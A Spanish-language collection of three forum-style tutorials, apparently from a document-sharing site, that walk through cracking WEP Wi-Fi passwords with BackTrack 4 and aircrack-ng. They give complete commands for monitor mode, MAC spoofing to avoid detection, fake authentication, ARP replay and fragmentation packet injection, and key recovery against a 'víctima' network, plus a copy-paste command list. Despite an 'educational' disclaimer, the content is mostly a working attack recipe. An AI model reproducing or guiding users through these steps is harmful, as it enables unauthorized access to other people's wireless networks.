Está en la página 1de 11

TUTOTIAL BACKTRACK

Hola amigos de taringa para mi primer post voy a enseñarles a usar facilmente
y sin rodeos complicados el backtrack para hacer auditoria a tu red wireless Ojo
tambien se sacar las claves WPA o TKIP .. me avisan si les interesa .

1. Bajar el Distro BACKTRACK 4 lo pueden bajar a aki : http://www.remote-


exploit.org/cgi-bin/fileget?version=bt4-beta-iso

2 Obiamente lo queman en un DVD y luego botean desde el DVD ojo se inicia


solo le dan a enter en la primera pantalla , luego empesara a cargar ficheros ,
les pedira una clave es la siguente :

Login : root
Pass : toor

Luego cuando pida comando escriben startx

3 Una vez dentro buscamos en el "inicio" una aplicacion llamada konsole .

4 Escribe ifconfig luego buscas tu interfaz de red que puede llamarse wlan0 ,
rausb , eth0 etc ... y buscas adonde dice hardware adress : anotas ese
numero . ojo .. el numero llega hasta los 00 del final ...esa es tu direccion mac.
luego cierras esa ventana .

5 Abrimos otra konsole y escribimos : airodump-ng wlan0(tu interfaz de red)


y selecionas la red a atacar. de ella copias el mac, bssid y el canal . cierras la
ventana .

6 Abrimos otra konsole y escribimos : airodump-ng -c 6(canal de la victima) -w


prueba(Nombre que le quieras dar al archivo de las capturas) --bssid
66:77:88:99:00:11(mac de la victima) wlan0(tu interfaz de red) , con esto solo
te aparecera el AP de tu victima , fijate en donde dice DATA ... esa cifra tiene
que llegar a 15.000 o mas para comenzar a decriptar la clave .

7 Para acelerar este proceso ya ke es muy lento o simplemente no manda


DATA necesitamos abrir otra konsole dejando la anterior abierta . y ahi
escribimos : aireplay-ng -1 0 -a 66:77:88:99:00:11(mac del victima) -h
00:11:22:33:44:55(mac tuya) -e ejemplo(bssid de la red ke atacamos osea el
nombre) wlan0(tu interfaz de red)

8 en este momento deberias empezar a recibir DATA mas rapido .. pero en


algunos casos demora mas poque no hay trafico de red ... luego se este paso
podemos acelerar aun mas el proceso inyectandole trafico a el router con el
siguente comando :

aireplay-ng -3 -b 66:77:88:99:00:11(mac victima) -h 00:11:22:33:44:55( tu


mac) wlan0(tu interfaz de red)

con eso deberia ir muy rapido recibiendo data ... luego cuando tengas sobre
15.000 no cierres la konsole y abre otra .

9 Escribes aircrack-ng prueba(el nombre k le pusiste al archivo de capturas)-


01.cap

Nota : si comienzan a salir numeros circulando rapido kere decir ke no te


alcanzan los data capturados y debes esperar mas . vas intentando hasta ke
salga key found : 00:00:00:00:00 esa es la clave de tu red inalambrica la copias
sin los 2puntos solo los numeros y la ingresas .

Bueno eso fue como sacar claves wep sin tanto rodeo ni cosas extrañas. pero
repito hay routers que tienen mas protecion o ke mandan DATA mas lento y
solo es cosa de esperar .. ahh y lo ultimo no funciona con routers con
encryptacion TKIP o WPA2 ke a mi juicio son las mas seguras del mundo

TUTOTIAL 2

IMPORTANTE: ESTE TUTORIAL ES CON FINES EDUCATIVOS Y QUE SIRVA


PARA PODER AUDITAR LA SEGURIDAD INALAMBRICA DE UN RED

Bueno antes que nada este es mi primer tutorial y hago este post ya que son pocos los
tutoriales que estan en español y son un poco confusos, asi que lo voy a tratar de hacer
de una forma que se pueda asimilar.

Hardware que yo utilice para realizar el tutorial:


Compaq v3618LA con tarjeta inalambrica Broadcom 4311
(NOTA: Verificar si tu tarjeta de red inalambrica es compatible con backtrack en el
siguiente link:

http://www.backtrack-linux.org/forums/hardware-compatibility-list/
Software utilizado:
Live CD de BackTrack 4 (beta).

Pueden descargarlo desde el siguiente link:

http://www.backtrack-linux.org/downloads/
(NOTA: hay varias versiones para descargar, pero la unica que me a funcionado a mi es
la BackTrack 4)

Cuando ya lo hayas bajado y quemado pues introduce el CD en tu cd-rom y reinicia la


computadora y has que se inicie desde el cd de backtrack)

cuando te pida usuario y contraseña usa los siguientes:


Usuario: root
Contraseña: toor
Introducelo todo en minusculas

Luego cuando ya todo cargue escribe lo siguiente:


startx
Esto es para que se inicie el modo grafico.

Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es que ya cargo y esta
listo para ser utilizado.

Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo
siguiente:
airmon-ng
Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o
eth1, cosas asi por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.

Luego introduce los siguientes comandos:


airmon-ng stop wlan0
ifconfig wlan0 down
Con esto deshabilitas la tarjeta de red inalambrica para hacerle un cambio de mac, este
con dos razones importantes: 1. Para que asi no haya problemas de que te puedan
detectar e impedirte futuras conexiones y 2. Vas a necesitar el numero de mac mas
adelante y esta es una facil de escribir y recordar.

Para cambiar la mac escribe los sigueintes comandos:


macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y
con el segundo habilitaste nuevamente tu tarjeta de red inalambrica (puede tardar un
poco este ultimo comando)

Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente
comando:
airodump-ng wlan0
Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da
la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el
tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de
la red inalambrica).
Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos
a utilizar los que mencione.

Una lista de redes inalambricas puede ser esta que tome:

Cuando selecciones la red inalambrica que vamos a atacar apreta Ctrl + C para parar el
proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.

Para explicar bien esta parte vamos a poner un ejemplo:


BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo

Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el
siguiente comando:
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en
la direccion /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son
los paquetes que llevamos capturados, para poder descifrar una wep es necesario mas de
20,000 paquetes. Te daras cuenta que puede ir muy lento, esto significa que ninguna
persona esta utilizando la red entonces no esta generando trafico y te podria llevar dias
llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar
trafico en la red.

Un ejemplo de lo q tendrias q ver es esto:

Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los
siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:19:5B:D1:02:8E -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfuld.
Lo que tendrías q ver es algo como lo siguiente:

esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razon no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar esta muy lejos
-Tu tarjeta de red no puede hacer inyeccion de paquetes
-El router tiene seguridad para evitar este tipo de ataques

Ahora para inyectarle el trafico introducce el siguientes comando:


aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0

Tendrías que ver esto:

Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde
estas capturando los paquetes te daras cuenta que la DATA va caminando muy rápido.

Tendrías que ver como avanza el data rápidamente:

Ahora abre otra terminal (consola) e introduce el siguiente comando:


aircrack-ng prueba-01.cap
Donde:
-Prueba-01.cap es el archivo donde se estan capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto
significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la
siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o numeros de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalambrica seria 1234567890.

Esta seria la imagen final donde te muestra la contraseña:

Para esta red la contraseña seria 6362633135.

Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden
que debe de ser para que solo le den copiar:

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap

Como se daran cuenta son pocos comandos pero llevan mucha explicacion y lo trate de
hacer de una forma entendible, ya estoy trabajando en el video, asi que no se preocupen
si no entienden, pronto voy a sacar el video donde igual voy a explicar los pasos.

Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos
formas que me han funcionado perfecto:

Forma 2:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 3:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y
<archivo .xor> -w ARP
# aireplay-ng -2 -r ARP wlan0

Cualquier duda me la hacen saber y les tratare de ayudar en lo que pueda.

TUTORIAL 3

Hola amigos, les traigo un manual para comprobar (Romper/hackear-crackear redes wi-
fi) la seguridad wireless de nuestra casa (la victima), es muy útil para verificar si
necesitas reforzar la seguridad wifi, para ello necesitaremos un DVD-Live de Back
Track 4 y un portátil o un sobremesa con tarjeta wireless.

Al final pondre los links de descarga y matizaré sobre algunos comandos.

Una vez conseguido el DVD-Live de Back Track 4 insertamos el DVD en la unidad


óptica y reiniciamos el PC. Según la bios de la placa tienes que darle a F2 o Esc o
F10…etc para entrar al menú de arranque, una vez aquí seleccionar la unidad óptica y
pulsar Enter.

Una vez pulsado Enter saldrá una ventana con varias opciones a elegir, elegir las dos
primeras de arriba que corresponden al Inicio con Resolucion 1024×768 o con la
Resolucion 800×600. Una vez cargue el Sistema, saldrá una ventana de línea de
comandos y debereis poner “startx” y empezará el modo gráfico.
Aquí empieza todo el proceso:

Abrir un terminal para ver que interfaz estamos usando, para ello escribid sin comillas:

“airmon-ng”

Una vez sepamos nuestro interfaz procedemos a escanear la red, volvemos a escribir en
la misma terminal:

“airodump-ng wlan0″ (wlan0, ath0,…etc es el interfaz)


Cuando ya observemos que encuentra nuestra red, cancelamos el proceso con Tecla Ctrl
+ Tecla C, abrir una nueva terminal y escribimos en este caso para capturar balizas de
señal (Beacons) y paquetes de datos (#Data/s):

“airodump-ng -w wep -c 11 –bssid ff:ff:ff:ff:ff:ff wlan0″

http://sites.google.com/site/mipequenorinconcito/Home/bactrack4.doc?attredirects=0
[airodump-ng -w (cifrado wep) -c (canal) --bssid(bssid) interfaz] //es posible que no
identifique la red y os pedirá que introduzcais el ESSID ( es el nombre de la red) en este
caso pondremos [--essid nombre_de_la_red].

Los datos de el canal y bssid deben ser los de nuestra red wireless.
Atencion: no detener el proceso hasta que tengamos por lo menos 35.000 paquete de
datos(#Data/s)

El siguiente paso es asociarnos a la red para ello abrimos una nueva terminal y
escribimos (se puede hacer mientras está capturando paquetes) el siguente comando:

“aireplay-ng -1 0 ff:ff:ff:ff:ff:ff:ff wlan0″

Una vez asociados en la misma terminal escribimos este comando para abrir/leer los
paquetes capturados en el comando antes puesto que sigue corriendo:

“aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0″

Una vez obtenidos los 35.000 paquetes de datos como mínimo y leidos unos tantos
miles tambien, procedemos a crackear la contraseña.

Primero debemos saber como se llama el fichero donde se ha almacenado, para ello en
la terminal, escirbimos:

“Dir” y copiamos el nombre del fichero .cap

Una vez realizado esto pasamos al último paso:

“aircrack-ng nombre_fichero.cap”

Con este comando empezará a averiguar la contraseña de nuestra wireless, si no la saca


es que tiene buena seguridad o que no as conseguido suficientes paquetes, pero dada
que la autenticacion es WEP, la sacará porque se ha quedado obsoleto y se puede
averiguar la contraseña como en este manual explico.

Recomiendo poner de seguridad WPA/PSK o WPA2


Descarga DVD-Live Back Track 4:

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso

Opciones de comandos:

–bssid = MAC del Punto de acceso/Router

La MAC es un es un identificador de 48 bits que corresponde de forma única a una


tarjeta de red. (ff:ff:ff:ff:ff:ff)

-c canal = es el canal de nuestra red puede oscilar del 1 al 11

Espero que les haya servido este post, es muy bueno, funciona 100%, si no coje la
tarjeta de red es que el Sistema Operativo no tiene el driver de su tarjeta de red, espero
respuestas.

Ya saben agregen a favoritos!


Espero que les haya servido,comenten, no cuesta nada.
Me costó trabajo hacerlo.
Un saludo.
Relacionados: Backtrack 4 en USB y Live- CD.

Tutorial:
http://sites.google.com/site/mipequenorinconcito/Home/bactrack4.doc?attredirects=0

Descarga el DVD en formato iso:


http://www.backtrack-linux.org/download.php?fname=bt4f

También podría gustarte